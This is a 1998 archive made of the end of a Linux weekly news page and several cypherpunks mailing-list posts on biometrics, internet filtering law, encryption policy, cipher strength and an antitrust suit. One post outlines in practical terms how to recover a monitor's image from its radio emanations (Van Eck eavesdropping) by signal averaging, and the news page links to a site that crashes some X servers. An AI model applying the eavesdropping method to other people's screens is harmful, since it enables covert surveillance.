>    less than usually forgiving in this regard; SMP kernels on a
>    uniprocessor machine can die in weird and unpleasant ways.
>    Unfortunately, SMP is still the default, and is not a configuration
>    option; you need to edit the Makefile and comment out the SMP = 1 line
>    near the beginning. Believe me (voice of experience here) it's an easy
>    thing to forget...
>    
>    Also in the SMP arena is a flurry of activity around IO-APIC use. The
>    IO-APIC is an interrupt controller on multiprocessor systems which is
>    able to route interrupts to any CPU, thus helping to create a true
>    symmetric multiprocessing system. However, each motherboard seems to
>    do it a little different, leading to one of those bits of hardware
>    obnoxiousness that takes a long time to sort out. The 2.1.85 kernel
>    added a document describing IO-APIC for those interested in the
>    details.
>    
>    Is the Linux Maintenance Project dead? The question was raised this
>    week, since the web pages have not been updated in recent times. The
>    answer is that the maintainer is busy, and some new ways of running
>    the web pages are being worked out. Expect some activity there in the
>    not-too-distant future.
>    
>    William Stearns is working on a program to automate the process of
>    building a new kernel. Check out his web page for more info. Since
>    we're a weekly publication, chances are we'll be behind a rev or two
>    on the kernel release by the time you read this page. Up-to-the-second
>    information can always be found at LinuxHQ.      [DISTRIBUTIONS] 
>    
> Debian
> 
>    Yes, it's true! Debian is dumping dselect! From the recent mention on
>    debian-announce, the new package manager meant to replace dselect is
>    now being demonstrated and will probably appear in 2.1 or one of the
>    early point releases.
>    
>    Mentioned recently on debian-announce, a Debian system was used to
>    develop the AMSAT Phase 3-D satellite, one of the series of Ham Radio
>    Satellites. Check it out here.
>    
>    A reminder to frustrated Debian users who are only finding their
>    favorite software in RPM format: "alien" can be used instead. If you
>    have trouble with alien, try upgrading to debianutils 1.6.
>    
>    The January issue of the German magazine CHIP Extra comes with a
>    CD-ROM containing Debian 1.3.1 and the Beta version of StarOffice 4.0
>    for Linux. Review from debian-user indicates that the issue is very
>    well done, with a lot of useful info for both novices and users.
>    Here's CHIP's Web site, primarily in German.
>    
> Red Hat
> 
>    Red Hat reports recent turn-over in their support staff which has hurt
>    the Red Hat installation support they provide via e-mail to people who
>    purchase their $50 set. They "have been working to midnight and
>    beyond" to catch up with the backload and have hired new staff. Robert
>    Hart (Red Hat's support manager) assured people on redhat-list that
>    Red Hat installation support will not be terminated at 30 days if a
>    delay on their part caused the time to run out.
>    
>    Red Hat 5.0 users have also been griping a bit about how the errata
>    pages are handled. Complaints include slow updates, and Red Hat's
>    tendency to update existing entries, making it very hard to notice a
>    second update for a given package. A call was made for public
>    announcements from Red Hat whenever updates go out.
>    
>    Users on redhat-list have been poking at
>    http://www.ee.surrey.ac.uk/Personal/L.Wood/IE4mk/, finding that
>    accessing it from Netscape 4.04 crashes some Xservers, and not others,
>    depending on your Xserver and Linux version. No direct link is
>    provided, on-purpose, but feel free to check it out!.
>    
>    Off-topic, but on the redhat-list, Dave Wreski compiled and posted a
>    list of free ssh-clients for Windows. He would like to see people
>    choose one, try it out and post a review, since interest in them is so
>    high.
>    
> Slackware
> 
>    Reported on bugtraq: Imapd/ipop3d problems in slackware 3.4 if you
>    install the pine package. When fed an unknown username, imapd and
>    ipop3d will dump core. Details here. Patrick Volkerding [maintainer of
>    Slackware] has already responded and will put out a repaired package.
>    
> S.u.S.E
> 
>    For the Linux trivia buffs, S.u.S.E stands for 'Software und System
>    Entwicklung', which means software and system development. If you're
>    interested in S.u.S.E's history, check out this post from Bodo Bauer.
>    
>    How do you pronounce S.u.S.E? A popular Americanism is "Suzie", but if
>    you ask in Germany, the pronunciation will be closer to "Seuss-eh" (as
>    in Doctor Seuss) or "Souss-uh". Boy was it fun to watch people try and
>    describe a sound in an e-mail message!
>    
>    There are a lot of converts from various Unix flavors on the
>    suse-linux-e list (of course!). If you're interested in comments from
>    one person who recently installed the distribution, check it out.
>      [Ports] 
>    
> Alpha
> 
>    At least one Linux system vendor (Net Express) has stopped selling
>    Alpha-based systems as a result of the Compaq takeover of Digital. See
>    their Alpha systems page for details on their reasoning. On the other
>    hand, most other vendors and the Alpha discussion lists remain
>    relatively calm on this subject, suggesting that not everybody is
>    worried.
>    
>    There is an article in SunWorld Online about the Compaq takeover. No
>    real conclusions, but they raise some concerns.
>    
> Sparc
> 
>    People are already asking whether SPARC/Linux will run on the new,
>    PCI-based Ultra workstations. No definitive answer has been posted,
>    but it seems awfully unlikely. The new bus, new video, and (oh joy)
>    IDE disks are all stuff that SPARC/Linux has never had to deal with
>    before.  /td>      [Software Development] Almost overnight, the
>    linux-ha (linux high-availability list) has revived and is generating
>    good discussion! If you are interested in high-availability Linux
>    solutions, now is the time to get involved! You can subscribe to
>    linux-ha on the Linux Mailing Lists page.
>    
>           [Articles] Some folks are discovering they can no longer access
>    hosts with underscores in their names. Host names with underscores
>    have always been against the rules, but many systems have let them
>    work anyway. However, the new GNU C library, shipping with the latest
>    Linux distributions, enforces this rule. If you have host names with
>    _underscores_, you might want to consider renaming them soon.
>    
>    Want to run Oracle 7.3.3 under Linux? Jan Andersen posted a detailed
>    howto describing the path to there using the IBCS package.
>    
>    If you see these errors from Netscape Communicator 4.04:
>    
>      sh: -c line 1: missing closing `)' for arthmetic expression sh: -1
>      line 1: syntax error near unexpected token `;' sh: -c line 1:
>      `((/usr/local/bin/rvplayer /tmp/MO34B2F4B209B0136.ram); rm /tmp/\
>      MO34B2F4B209B0136.ram )&'
>      
>    your problem is actually probably your version of bash. Try upgrading
>    to the latest version (2.01) to fix the problem. 
>    [Announcements] 
>    
> Software and documents
> 
>     Package Version Description accton 4.0 Driver for Accton pocket
>    ethernet adaptor buslogic 2.0.11 Leonard Zubkoff's outstanding
>    BusLogic SCSI adaptor driver CD patch Patch to 2.0 33 kernel to
>    support new CD formats datapult 2.02 Scripting language for web
>    servers ddd 2.2.2 Graphical front end to gdb (very nice) FireMyst 0.8
>    Small, UMSDOS-based system (for recovery diskettes) fnorb 0.4 CORBA
>    object request broker for Python. One of the best-named packages out
>    there, in your editor's opinion. freetype 1.0 TrueType font rendering
>    engine ImageMagick 4.0 Amazing image manipulation/conversion system
>    KDEbeta 3 K desktop environment lftp 0.14.0 Command-line FTP client
>    lilo-color Patch to Lilo 20 to display boot messages in color linbot
>    0.3 Web site management tool mat 0.15 System administration tool plor
>    0.3.2 Offline mail and news reader secure-linux Patch to kernel 2.0.33
>    to add a number of security features. SMS client 2.0.5 Send SMS
>    messages to mobile phones snipix 2.12 Run SNA (and talk to your old
>    IBM mainframes) on your Linux box. Free for Linux, commercial for
>    other OS's. Software Building mini-HOWTO 1.52 HOWTO on building
>    software from source StarOffice 4.0 Office suite, free for private use
>    TkInfo 2.4 Tcl/Tk-based info browser TtH 1.1 Translate TeX to HTML
>    webalizer beta WWW server log analysis xbomb 2.1 X-based minesweeper
>    game LLNL XDIR 2.1 Motif-based graphical FTP client xtc 0005 X toolkit
>    in Java zed 1.0.1 "Fast, powerful, simple, configurable" text editor.
>      -->
>    
> Projects
> 
>    A bunch of ambitious folks have announced the Java/Linux NC project.
>    They want to provide a complete network computer implementation, with
>    a full set of Microsoft-type applications, for free. Java and Linux
>    are their tools. It's a big project, and I wish them luck; check out
>    their announcement for more info, or to join up.
>    
>    Other folks want to clone Userland's "Frontier" scripting environment.
>    See their announcement for more.
>    
>    A volunteer-supported (commercial) Webzine, 32 Bits Online is looking
>    for LINUX writers to share with the world why Linux is their operating
>    system of choice. If you're interested in an audience for your
>    opinions, send e-mail to Ronny Ko.
>    
>    The Virtuoso project seeks to put together a fancy 3d graphics package
>    for Linux. See their announcement if you would like to help.
>    
>    The folks with the amazing samba project are setting out to create a
>    free NT domain controller.
>    
>    The Linux Clothing Project moves into a new phase of Linux fashion.
>    Heaven forbid we have any naked Linuxes out there...
>    
> Web Sites
> 
>    The LSDB (Linux Software Database), a cgi searchable database of linux
>    software has moved. The new address is http://www.egypt.pca.net. 
>    
> Events
> 
>    1998 Atlanta Linux Showcase, October 23 - 24, 1998, Atlanta, Georgia.
>    
>    Asia and Pacific Rim Internet Conference on Operational Technologies
>    (APRICOT). Manila, Philippines, February 16-20, 1998.
>    
> On the lighter side
> 
>    A native returning "down under" after a year and a half gives a note
>    on Linux' increased popularity in Australia.
>    
>    Some fear that the joke announcement that Linus was going to integrate
>    Netscape into the Linux Operating System may have the same lifespan as
>    the Good Times Virus ...        Eklektix, Inc. Linux powered! This
>    page is produced by Eklektix, Inc. 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Miller <dm0@avana.net>
Date: Tue, 10 Feb 1998 23:47:59 +0800
To: cypherpunks@Algebra.COM
Subject: Spanish biometric project 45% complete
Message-ID: <34E09F10.6AB7@avana.net>
MIME-Version: 1.0
Content-Type: text/plain



>Business Systems Magazine, Feb. 1998, p. 78:

>BIOMETRICS PROTECTS GOVERNMENT DATA

>For example, Spain's government recently integrated biometric
>verification units in 633 informational kiosks that will
>eventually be used by 7 million citizens (the project is 45%
>complete).
>...
>The 633 kiosks are located in various government offices in
>the Andalusia region of Spain, says John Souder, program
>manager for Unisys.  The Spanish Government plans to implement
>the kiosks nationwide.
>...
>To use the kiosks, citizens had to obtain a smart card with
>their name and an ID number.  Citizens also had to be "enrolled"
>in the system.  During the enrollment process, each citizen's
>right or left index fingerprint is scanned and stored to the
>smart card.  That way, the system can verify the citizen using
>the card is the same person authorized to use it.
>...
>Citizens can then access databases for the National Institute
>of Social Security; the National Institute of Employment; the
>General Treasury of Social Security and the Social Institute
>For Sea Workers.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Wed, 11 Feb 1998 00:02:52 +0800
To: cypherpunks@cyberpass.net
Subject: Re: school filter legislation
Message-ID: <83939ee93a7f8bf2a9dea3a90f96910a@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Filtering sex off the Net in schools 
By Reuters 
NEWS.COM 
February 10, 1998, 5:55 a.m. PT 
URL: http://www.news.com/News/Item/0,4,19002,00.html 

WASHINGTON--Senate Commerce Committee chairman John McCain 
(R-Arizona) and Sen. Ernest
Hollings (D-South Carolina), the ranking Democrat on the panel, 
introduced a bill yesterday to protect children
from sexually explicit materials on the Internet at school and in 
the library. 

The Commerce committee will hold a hearing on indecency on the 
Internet today. 

The legislation would force schools and libraries to filter or 
block access to some Internet sites in order to
qualify for billions of dollars of federal subsidies aimed at 
bringing more computers into classrooms and public
libraries. 

Under the legislation, schools would have to certify with the 
Federal Communications Commission that they
are using or will use a filtering device on computers with 
Internet access so that students will not be able to
access sexually explicit or other materials deemed "harmful." 

A school would not be eligible to receive government subsidies 
for universal access to the Internet unless it
met those conditions. 

To qualify for the subsidies, libraries would be required to use 
a filtering system on one or more of their
computers so that at least one computer would be "suitable for 
minors' use," McCain's office said. 

"The prevention lies not in censoring what goes on the Internet, 
but rather in filtering what comes out of it onto
the computers our children use outside the home," McCain said. 

In a speech on the Senate floor introducing the measure, McCain 
noted that when the word "teen" was typed
into a Web search engine, a site about teen sex was the first 
search result to appear. 

Civil liberties groups have criticized efforts to filter access 
to materials available on the Internet, saying that
such technologies often block out data that children need to 
learn about AIDS prevention and find support for
depression and issues related to their sexuality. 

Hollings said the legislation gave schools and libraries "an 
added financial incentive to filter children's access
to the Internet," adding, "We must tackle this problem of 
children innocently stumbling onto indecent material
while using the Web for legitimate research purposes or face dire 
consequences." 

Under the legislation, school and library administrators would be 
free to choose any filtering or blocking
system that would best fit their community standards and local 
needs. 

The bill forbids the federal government from making "qualitative 
judgments about the system a school or
library has chosen to implement," according to a summary. 

Sen. Dan Coats (R-Indiana) and Sen. Patty Murray (D-Washington) 
are also sponsoring the legislation. 

Story Copyright (r) 1998 Reuters Limited. All rights reserved. 


 Go to  Front Door   |   The Net   |   Search   |   Short takes  
 |   One Week View 

  
 Copyright (r) 1995-98 CNET, Inc. All rights reserved. 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 11 Feb 1998 03:13:48 +0800
To: cypherpunks@cyberpass.net
Subject: Sen. Feinstein explains why she supports crypto-restrictions
Message-ID: <Pine.GSO.3.95.980210110120.26212F-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Tue, 10 Feb 1998 11:00:33 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Sen. Feinstein explains why she supports crypto-restrictions



---------- Forwarded message ----------

Date: Mon, 9 Feb 1998 20:15:42 -0800
From: Christopher Allen <ChristopherA@consensus.com>
Subject: Re: Letter to Senator Dianne Feinstein

I received a response to the "Letter to Senator Feinstein" today. It reads
as follows:


February 3, 1998

Mr. Christopher Allen
President and CEO
Consensus Development Corporation
2930 Shattuck Avenue
Suite 206
Berkeley, California  94705

Dear Mr. Allen

	This is in response to a January 16th unsigned letter from a group
of high technology companies on encryption policy. 

	In this letter, you urge me to meet regularly with representatives
from the companies who sent the letter. I want to assure you that both I
and my staff do meet regularly with executives from California firms who
are concerned about all aspects of our government's laws and policies
regarding the high tech industry. Indeed, I cannot recall ever rejecting a
request for a meeting with a CEO on the issue of encryption or other
matters of great import. 

	Should you or any of your co-signers wish to meet with me, please
just call my or my scheduler, Trevor Daley at 202/224-9636. 

	With regards to my position on encryption, I have no one solution
that I favor, included mandated key recovery. However, I am concerned that
whatever solution is devised must provide solutions to the issues raised
by FBI Director Louis Freeh, which have been reinforced by classified
briefings and public hearings that I have attended. 

	Should you have any additional questions about my views on
encryption please review a Question & Answer interview I gave to the San
Jose Mercury News last September. My answers, though general in nature,
accurately set forth my thinking. However I recognize the complicated
nature of encryption and am eager to hear industry proposals. I look
forward to a continuing dialogue on this issue with you and your
colleagues. 

	With warmest personal regards.

	Sincerely yours,

	Dianne Feinstein
	United States Senator

DF:seg

(enclosure: "Why Feinstein is supporting encryption curbs", San Jose
Mercury News, Monday, September 15th, 1997, page 1E)

------------------------------------------------------------------------
...            ** NOTE NEW OFFICE ADDRESS & PHONE NUMBER **            ..
... Christopher Allen                Consensus Development Corporation ..
... President & CTO                            2930 Shattuck Ave. #206 ..
... <ChristopherA@consensus.com>               Berkeley, CA 94705-1883 ..
... <http://www.consensus.com>            o510/649-3300  f510/649-3301 ..








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 11 Feb 1998 03:27:18 +0800
To: Alan Tu <cypherpunks@toad.com>
Subject: Re: Algorithms used in PGP 5.x; Relative strength of Blowfish
In-Reply-To: <199802092337_MC2-32B1-60F5@compuserve.com>
Message-ID: <3.0.5.32.19980210111529.007b75a0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 11:36 PM 2/9/98 -0500, Alan Tu wrote:
>anything besides 3DES and IDEA, what are their relative strengths to 3DES
>or IDEA? 

Before you can measure something's strength, you have to define
the stress.  Are you twisting it or bending it?  Compressing or pulling?

Are you trying an exhaustive keyspace search?
Are you trying to find a weak key?  Or some information leaking through?
Can you pick the plaintext to put through the system, and twiddle bits?
Or does your adversary only have access to some plain + cipher pairs?

None of the algorithms has been shot out of the water.  All of them annoy
statists, since
they can use more bits than is convenient to search through.  That's why
40-bit
anything is laughable.  

>Also, what's the relative strength of Blowfish to 3DES or IDEA?  Its key
>length is variable, as I recall.  Could someone tell me the range?

3DES uses 3 x 56 bits of user key, 56 bits being the DES keylength, defined
by the Feds
by neutering IBM's Lucifer system.  DES uses some fixed tables with unknown
(but upon investigation, apparently good) properties.

Blowfish uses over 4Kbytes of internal key, derived from a user-key
of up to 448 bits by mixing the user-key with random digits in a
computationally
expensive way that slows keysearch.  

Both Blowfish and DES are based on Feistel networks, ie, iterations
of rounds containing permutations, substitutions, addition and xors,
including data-dependant operations (ie, one fraction of the input data
(as well as the user's key, or derivations thereof) modifies the other
fraction in each round).  The 'fractions' are usually halves, but
unbalanced feistel networks have been studied too (e.g., McGuffin
algorithm).  BF was
designed with modern 32-bit cpus (and their cache sizes) in mind.
3-DES is a temporary kludge.

IDEA doesn't use tables, but uses the shift operator which the others
don't.  This is 
newer (less historical scrutiny) than DES or BF's structure.  IDEA is
patented, the
others aren't.

You should find the papers on these, there's descriptions and code
on line.




------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Crispin <kent@songbird.com>
Date: Wed, 11 Feb 1998 03:48:35 +0800
To: cypherpunks@toad.com
Subject: Re: Soft Tempest
In-Reply-To: <tw7k9b5uzhy.fsf@the-great-machine.mit.edu>
Message-ID: <19980210113051.14971@songbird.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, Feb 09, 1998 at 09:31:05AM -0800, David Honig wrote:
> At 10:14 PM 2/8/98 -0800, Tim May wrote:
> >At 9:19 PM -0800 2/8/98, Ryan Lackey wrote:
> >
> >
> >The physics suggests just the opposite: the RF emissions from laptops are
> >expected to be lower from first principles, and, I have heard, are
> >measurably much lower. (I say "have heard" because I don't have any access
> >to RF measurement equipment...I once spent many hours a day working inside
> >a Faraday cage, but that was many years ago.)
> ...later...
> >But before going this route, I'd want to see some measurements. Laptops
> >might already be "quiet enough." (Measurements are needed to determine the
> >effectiveness of any proposed RF shielding anyway, so....)
> 
> The interference that laptops can cause with avionics is 
> prima facie evidence that laptops are not quiet.

Even palmtops are quite noisy, in fact.

-- 
Kent Crispin, PAB Chair			"No reason to get excited",
kent@songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 01:51:08 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: [Fwd: The Caldera lawsuit vs MS: alive and well] (fwd)
Message-ID: <199802101750.LAA03216@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-alg-l@lists.io.com Tue Feb 10 11:24:16 1998
Message-ID: <34E08D1C.9FDF1AF8@bga.com>
Date: Tue, 10 Feb 1998 11:23:40 -0600
From: Stu Green <stugreen@bga.com>
X-Mailer: Mozilla 4.03 [en] (X11; I; Linux 2.0.33 i586)
MIME-Version: 1.0
To: alg-l@lists.io.com
Subject: [Fwd: The Caldera lawsuit vs MS: alive and well]
Content-Type: multipart/mixed; boundary="------------9A07051BBF5BBA9469DB7E8D"
Sender: owner-alg-l@lists.io.com
Precedence: bulk
Reply-To: alg-l@lists.io.com

This is a multi-part message in MIME format.
--------------9A07051BBF5BBA9469DB7E8D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit


--------------9A07051BBF5BBA9469DB7E8D
Content-Type: message/rfc822
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: from mail1.realtime.net (mail1.realtime.net [205.238.128.217]) by zoom.bga.com (8.6.12/8.6.12) with SMTP id LAA21596 for <stugreen@bga.com>; Tue, 10 Feb 1998 11:00:38 -0600
Received: (qmail 28812 invoked from network); 10 Feb 1998 17:00:33 -0000
Received: from rim.caldera.com (207.179.39.2)
  by mail1.realtime.net with SMTP; 10 Feb 1998 17:00:33 -0000
Received: (qmail 4352 invoked by uid 87); 10 Feb 1998 17:00:23 -0000
Delivered-To: majordom-caldera-users@rim.caldera.com
Received: (qmail 4340 invoked by uid 87); 10 Feb 1998 17:00:21 -0000
Received: (qmail 4331 invoked from network); 10 Feb 1998 17:00:18 -0000
Received: from bigbird.telly.org (198.53.146.159)
  by rim.caldera.com with SMTP; 10 Feb 1998 17:00:18 -0000
Received: from elmo.telly.org [204.187.86.2] 
	by bigbird.telly.org with smtp (Exim 1.73 #1)
	id 0y2J2d-0004bq-00; Tue, 10 Feb 1998 12:00:15 -0500
Date: Tue, 10 Feb 1998 12:00:15 -0500 (EST)
From: Evan Leibovitch <evan@telly.org>
To: Caldera Users Mailing List <caldera-users@rim.caldera.com>
Subject: The Caldera lawsuit vs MS: alive and well
Message-ID: <Pine.LNX.3.95.980210114438.27088G-100000@elmo.telly.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: majordom-caldera-users-owner@rim.caldera.com
Precedence: bulk
Reply-To: caldera-users@rim.caldera.com


Personal note: This amendment appears to be fairly significant. 
Previously, the suit was only against practises related to MS-DOS;  now
Windows95 and 3.1 are part of the deal. 

At this point a settlement seems unlikely; November could be a *real*
interesting month.

- Evan

-----------------------------------------------------------------

FEDERAL COURT ALLOWS CALDERA TO FILE AMENDED ANTITRUST COMPLAINT AGAINST
MICROSOFT

Nation's Only Private Antitrust Lawsuit Against Microsoft Adds Claim that
Microsoft Illegally Tied MS-DOS Into Windows 95


Orem, UT -- Feb 10, 1998 -- The Federal Court hearing Caldera's antitrust
lawsuit against Microsoft has agreed to allow Caldera to amend its
complaint and introduce evidence at trial that Microsoft illegally created
a technical tie of MS-DOS into Windows 95. Caldera claims that the
unnecessary technical tie of MS-DOS into Windows 95 artificially created
an impression that DOS on the desktop was dead. In court, Caldera will
show that this act and other practices illegally eliminated competition to
MS-DOS. This latest court decision allows Caldera to extend its claims of
illegal behavior and its request for financial damages to include both
historical and existing practices. With this amendment, the courts are
allowing Caldera to include consideration of Microsoft's Windows 95,
Windows 3.1 and MS-DOS market shares when calculating both the industry
effect of Microsoft's alleged monopolistic practices and the financial
damages being sought by Caldera. 

"This amendment to our antitrust case is not about the benefits or
features of Windows -- it is about an illegal tie of MS-DOS into Windows
95. We allege Microsoft created this illegal, artificial tie for the
dominant purpose of eliminating competition," said Bryan Sparks, President
and CEO of Caldera.  "The evidence we have to support this new claim
coupled with the evidence we have to support our other claims extends our
conviction that we will win." 

Caldera can demonstrate that Windows 95 runs on DR-DOS, Caldera's version
of DOS, demonstrating that no technological dependency exists between MS-DOS
and Windows 95. In court, Caldera will use this fact to prove that the
unnecessary tie between MS-DOS and Windows 95 is one of the many illegal and
predatory tactics Microsoft has used and continues to use to maintain its
desktop monopoly power.

In November 1997, the court denied Microsoft's motion to change the venue
of Caldera's trial from Salt Lake City, Utah, to Seattle, Washington. This
case is currently scheduled for jury trial in November 1998 in Federal Court
located in Salt Lake City, Utah.




--------------9A07051BBF5BBA9469DB7E8D--

---
To unsubscribe send the message "unsubscribe alg-l" without quotes
to majordomo@lists.io.com
Send questions to owner-alg-l@lists.io.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 11 Feb 1998 05:02:08 +0800
To: "WebWarrior3@InfoWar.Com>
Subject: Re: Cyber 'Nannys"
In-Reply-To: <v03102804b105af4a91ed@[207.167.93.63]>
Message-ID: <v03102804b1066c52d1f9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:38 AM -0800 2/10/98, WebWarrior3@InfoWar.Com wrote:

>When you purchase or sell anything you enter into a contract with the
>other party,
>hence:UNIFORM COMMERCIAL CODE Article 21) In this Article unless the context
>otherwise requires "contract" and "agreement" are limited to those
>relating to the
>present or future sale of goods. "Contract for sale" includes both a
>present sale
>of goods and a contract to sell goods at a future time. A "sale" consists
>in the
>passing of title from the seller to the buyer for a price (Section 2-401). A
>"present sale" means a sale which is accomplished by the making of the
>contract.
mer Protection Laws."

I suppose that your point is that the UCC somehow relates to your argument
that filtering companies must supply customers with their filtering
criteria?

This is a serious distortion of the UCC, and, if applied, would mean:

-- a chip company would have to provide the internal workings of chips
sold, else they would be violating the disclosure laws

-- a restaurant critic (analagous to a net.nanny filter, essentially) would
have to provide access to his selection criteria

-- the editor of any magazine or newspaper would have to explain his
reasons for reporting some stories and not others, for including some
editorial remarks and not others, and so on.

My point about "absent a contract" is that sometimes there _are_
arrangements to supply internal workings of chips, restaurant selection
criteria, etc. If there are such arrangements, then a customer can sue to
get performance. But absent such prearrangements, a customer cannot
generally demand information on how products were built, on what went into
them, and so on.

A customer of Cyber Sitter or Net Nanny is free to ask the companies
involved what their criteria are, just as  in the above cases he may ask
the companies for more details. But if these companies decline to give
trade secret information, or information they choose for whatever reason to
keep to themselves, there is no recourse.

Except in a few cases (wrongly, I believe) involving food and drug
products, under FDA rules. Importantly, there are absolutely no such
requirements for labelling of "speech," or editorial decisions, which is
precisely the service being provided by Cyber Sitter and Net Nanny types of
services.

I believe any attempts to force, through law, the disclosure of editorial
selection criteria would quickly be struck down by the courts as a
violation of the First Amendment.

(Except in the usual cases involving recommendations about drugs, health
benefits, etc. And, no, I don't believe "psychological health" could be a
justifiable reason for the courts to accept laws forcing editors to
disclose their selection criteria.)

Face it, Cyber Sitter is saying "We think these are sites your child can
visit. " Forcing them to disclose their criteria--or even forcing them to
list all sites they disapprove of--is an infringement on their editorial
rights.

(And please don't anybody cite "commerce" as a justification...it hasn't
been a justification to regulate the speech of newspapers, publishers, or
other commercial ventures....)

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 11 Feb 1998 03:01:58 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST (fwd)
Message-ID: <199802101901.NAA04520@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: TEMPEST
> Date: Tue, 10 Feb 1998 18:32:28 +0000
> From: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>

> You might want to consider to read van Ecks paper yourself:
> 
>   Wim van Eck: Electromagnetic Radiation from Video Display Units: An
>   Eavesdropping Risk? Computers & Security 4 (1985) 269--286
> 
> If you don't have C&S in your library, you might also find a
> scan on <http://www.eskimo.com/~joelm/tempest.html>

I read the paper when it came out, but that's been a while now..:)

Thanks for the reference, I'll take a look at it over the next few days.

> > As I alluded to with the comment I made about integrating the received
> > signals. The easiest way to do this sort of stuff with a small budget is
> > with a flying capacitor integrator.
> 
> Please explain! I was more thinking in terms of digitizing everything
> and solving large per-pixel systems of equations to separate the drifting
> images, which does not sound much like something equivalent to a
> single hardware integrator, but more like something that keeps a
> workstation very busy for a few minutes.

I'll describe how it works in hardware and then how I've done it in
software.

Hardware:

You have a bank of n capacitors that are hooked to a amplifier via a
mux. You use a counter that you start with some sort of trigger that
sequentialy connects each cap in turn to the amplifier. The charge and as
a consequence the voltage varies depending upon whether the new voltage is
higher or lower than the last sample. The assumption being that the signal
itself is time invariant and that the variations in signal strength are
noise and random in nature. After only 3-4 cycles through the cap bank you
begin to pull a workable signal out of the noise. The nice thing is that
this works for signals that are below the noise floor and buried in the
grass.

In a VanEck monitoring situation you'd need a bank of n capacitors where n
is the number of horizontal pixels. You will also need to array each bank
into a m row matrix where m is the number of scan lines. You can get around
some of the bulk by using a gyrator circuit to synthesize the capacitor and
some sample-and-holds to synthesize the array.

The advantage here over software is that this signal can be sampled as its
built in real-time (use instrumentation amps) unless you happen to have
dual-port ram in your computer (I've never had access to such hardware) and
fed to whatever equipment you want to process it.

Software:

You take a A/D converter and drive an array with it. You sync it the same
sort of way as the hardware methods above. Each element in the array
contains the current estimate for that particular sample of the total
waveform. Each time you come back to the same array element you compare the
last value to the new value. You take the value that is half-way between the
two and store that as the new array value for the next cycle. In short order
a signal comes out.

Either the hardware or software method will naturaly integrate the signal
within the sample window because of the capacitor effect. This compensates
for clock and signal jitter quite nicely.

This method will require a D/A conversion process if you want to feed it
to any external equipment. Though it should be perfect for Van Eck
monitoring. Simply use your video frame buffer as your sample storage array.

Enjoy.


    ____________________________________________________________________
   |                                                                    |
   |                   The obvious is sometimes false;                  |
   |                   The unexpected sometimes true.                   |
   |                                                                    |
   |                                       Anonymous                    |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 11 Feb 1998 02:20:12 +0800
To: Tim May <tcmay@got.net>
Subject: RE: Cyber 'Nannys"
In-Reply-To: <34DF87FE.611AA4EF@InfoWar.Com>
Message-ID: <v03007801b10648625465@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



Some of my articles are at:

  http://cgi.pathfinder.com/netly/spoofcentral/censored/

As for the market, it's already deciding. NetNanny does NOT encrypt its
list of blocked sites and is using that as a competitive advantage.

-Declan

At 23:23 -0800 2/9/98, Tim May wrote:
>At 2:49 PM -0800 2/9/98, WebWarrior3@InfoWar.Com wrote:
>
>>While I do not disagree that these companies should be able to market
>>their products, I wholeheartedly disagree with the fact that often their
>>customers (the adults who bought the software or subscribed to he
>>'service') are not allowed to have a list of what is actually blocked,
>
>So you wholeheartedly disagree that they are not giving you a list of what
>is blocked...so go use another service.
>
>I don't mean to be flippant. At issue here is a very real issue of free
>choice and contracts. Customers cannot "demand" a list of criteria for
>blocked sites any more than customers can demand a list of the selection
>criteria a bookstore uses, or a magazine editor uses, and so on.
>
>I make fun of Cyber Sitter and other Net.Nannies, but there's no role for
>"disagreeing with the fact" (whatever that infelicitous expression may
>mean) that they usually don't publicize their criteria.
>
>If you can figure out their criteria, great. Brock Meeks and Declan M.
